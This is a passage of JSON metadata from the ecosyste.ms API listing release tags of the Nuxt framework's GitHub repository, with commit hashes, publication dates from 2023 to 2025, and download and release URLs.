ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000